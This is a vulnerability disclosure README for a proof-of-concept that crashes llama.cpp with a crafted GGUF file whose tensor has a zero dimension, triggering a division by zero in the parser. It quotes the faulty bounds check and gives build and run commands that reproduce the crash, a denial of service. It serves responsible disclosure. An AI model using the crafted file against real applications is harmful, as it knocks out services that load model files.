ryansecuritytest-fanpierlabs/llama-cpp-gguf-div-by-zero-poc

PoC: llama.cpp GGUF Division by Zero via Zero-Dimension Tensor

This repository contains a proof-of-concept for a security vulnerability. It is intended for responsible disclosure via huntr.com.

Vulnerability

The GGUF parser in llama.cpp (ggml/src/gguf.cpp) allows tensors with zero-valued dimensions to pass validation (line 623 checks < 0 instead of <= 0), which triggers a division by zero at lines 632-634 when checking for integer overflow.

Vulnerable code:

// Line 623: allows ne[j] == 0
if (info.t.ne[j] < 0) {  // should be <= 0

// Lines 632-634: divides by ne[1], ne[2], ne[3]
if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || ...))

Files

• malicious_div_zero.gguf — Crafted 128-byte GGUF file with tensor dimensions [1, 0]
• poc_llama_cpp_div_by_zero.py — Script that generates the PoC file and explains the vulnerability

Reproduction

# Build llama.cpp
git clone https://github.com/ggerganov/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j

# Trigger crash (x86_64: SIGFPE)
./build/bin/llama-cli -m malicious_div_zero.gguf

Impact

Denial of service (process crash via SIGFPE on x86_64) for any application loading crafted GGUF files.

Researcher

Ryan — Fan Pier Labs (ryan@fanpierlabs.com)